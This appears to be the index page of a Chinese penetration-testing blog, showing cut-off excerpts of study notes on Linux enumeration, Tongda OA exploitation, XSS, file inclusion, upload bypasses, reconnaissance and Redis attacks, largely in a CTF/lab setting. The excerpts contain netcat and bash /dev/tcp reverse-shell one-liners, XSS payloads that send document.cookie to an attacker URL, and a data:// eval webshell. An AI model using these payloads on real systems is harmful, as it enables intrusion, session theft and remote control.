lan1ocのBLOG

在hexo目录下创建脚本文件scripts/custom-index-generator.js 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455// scripts/custom-index-generator.js const pagination = require('hexo-pagination'); hexo.extend.generator.register('index', function(locals) { const config = this.config; const perPage = config.per_page || 10; const paginationDir = config.pagination_dir || 'page'; // Deep copy posts to avoid...

列举信息假设已经拿下权限，那就先收集下这台机器的信息 主机名1hostname 系统信息1uname -a 内核版本和其他数据的信息1cat /proc/version /etc/issue 系统版本1cat /etc/issue 看进程ps -A：查看所有正在运行的进程 ps axjf：查看进程树（请参阅下面的树结构，直到运行 ps axjf） ps aux：aux 选项将显示所有用户的进程 （a），显示启动进程的用户 （u），并显示未连接到终端的进程 （x）。查看 ps aux 命令输出，我们可以更好地了解系统和潜在漏洞。 一般直接用 1ps -aux 看环境变量1env 重点看path变量PATH 变量可能具有编译器或脚本语言（例如 Python），可用于在目标系统上运行代码或用于权限提升。 看允许用户使用 root 权限运行哪些命令(鸡肋，要密码)1sudo -l 看用户组1id 也可看其他用户 1id root /etc/passwd1cat...

nc弹shelllinux：法一1mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f 然后再攻击机上： 1sudo rlwrap nc ip port 该命令首先在 /tmp/f 处创建一个命名管道 。然后，它启动 netcat 侦听器，并将侦听器的 input 连接到命名管道的输出。然后，netcat 侦听器的输出（即我们发送的命令）通过管道直接传输到 sh，将 stderr 输出流发送到 stdout，并将 stdout 本身发送到命名管道的输入中，从而完成循环 法二1mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f 然后攻击机上 1sudo rlwrap nc -lvnp 404 windows：由于要转义的符号太多了，所以一句话木马改为 1<?php...

看版本：/inc/expired.php基本就是先用liqun工具箱吧，有的洞版本太老了就不管了适用于_通达_11.X全版本yii 前台反序列化（测试于11.7，小于12.3）有点难利用，过滤的函数挺多的：exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg不会绕过写shell，放弃了poc： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485<?php namespace yii\rest{ class CreateAction{ ...

利用：cookie盗取、凭据劫持、页面劫持、网络钓鱼、权限维持常见拿cookie payload(基于服务器上的脚本用的url)1<script>location.href="http://ip/1.php?cookie="+document.cookie</script> 1<img src="" onerror=location.href="http://ip/1.php?cookie="+document.cookie> 1<body onload="location.href='http://ip/1.php?cookie='+document.cookie"> 1<body onload="document.location.href='http://ip/1.php?cookie='+document.cookie"></body> 1<iframe...

文件包含的文件的内容会被当成当前脚本语言，与后缀无关本地包含源码中有: php：include、require、include_once、require_once等 include在包含中出现错误会触发警告，然后代码继续往下运行 require在包含中出现错误会直接报错并退出程序运行 java：java.io.File、java.io.FileReader等 ASP.NET：System.IO.FileStream、System.IO.StreamReader等 有文件利用无文件利用包含日志文件nginx 日志文件默认在 1/var/log/nginx/access.log 直接file协议包含 1file:///var/log/nginx/access.log 日志一般会记录ua头，所以可以把代码写在ua头，然后包含日志文件，就会显示执行结果 ctfshow...

首先格式解析是对应的，类型不对无法解析木马前端js验证（验证不通过都不发包）通过判断时间和前端源码分析，如果是仅通过js来过滤危险文件类型，直接禁用js以后再上传 解析缺陷.htaccess 1AddType application/x-http-php .png 将png图片解析成php文件 文件头校验直接在文件内容添加一个文件头就行，一般GIF都允许上传 1GIF89a 黑名单过滤(不在黑名单列表的类型都能上传)双写绕过（或者多写几轮，但是对于递归验证无法绕过）大小写绕过（linux敏感：全大写全小写，windows：可大小写混合）00截断（php小于5.3.4）ctf遇到过，实战没遇到当%00无法被解析的时候，将它url解码一下应该就行了，post请求体中要手动解码，如果是在url上的，会自动解码 白名单验证（只允许上传在白名单列表的类型）条件竞争（实战一般遇不到，ctf比较多）原理：逻辑缺陷了，先上传再判断 1<?php fputs(fopen('1.php','w'),'<?php...

复现测绘hunter 1web.body="/@vite/client" poc1url/etc/passwd?raw 深度利用可以看这

资产收集推荐的社区棱角社区 企业收集拓展企业目标，了解企业规模 爱企查（收费很便宜）直接拼多多或者咸鱼买会员就行主要是关注知识产权、邮箱地址、域名然后从业务资产中提取出web应用、app应用、小程序等 小蓝本（免费）虽然免费，但是不如爱企查等收费的更全面 域名查询从企业收集那里获取资产域名，然后再对域名进行进一步的信息收集 备案查询icp备案网备案管理系统可能会与企业收集中的有出入 域名注册url从域名注册里直接查更多同公司注册的域名，一种思路 ip反查域名微步 子域名收集dns数据查dns历史记录，看历史解析https://dnsdumpster.com/一般域名记录都用A记录、邮箱用MX记录 证书查询url带有https的都是有证书的，可以通过查询这个证书的使用范围来收集子域名https://crt.sh/ 网络空间（fofa、hunter、shodan那些）360夸克fofahunter国内一般以上三个 威胁情报微步、360、奇安信 枚举在线子域名查询子域名查询 工具：ofa安装流程1git clone...

redis一键利用工具工具下完要去RedisModulesSDK/文件夹make一下（vpn分配的是虚拟网卡的ip） 反弹shell先本地写个shell 1bash -c "bash -i >& /dev/tcp/192.168.198.48/404 0>&1" 然后本地开一个http服务让redis下载本地shell监听，反弹shell 练习http://10.3.4.96:10011/ （爆破） http://10.3.4.96:10012 （文件包含）直接data协议写shell了 1http://10.3.4.96:10012/?demo=data://text/plain,<?=eval($_POST[1]);?> 然后post传参 11=system('tac fl4gisisish3r3.php'); http://10.3.4.96:10013/...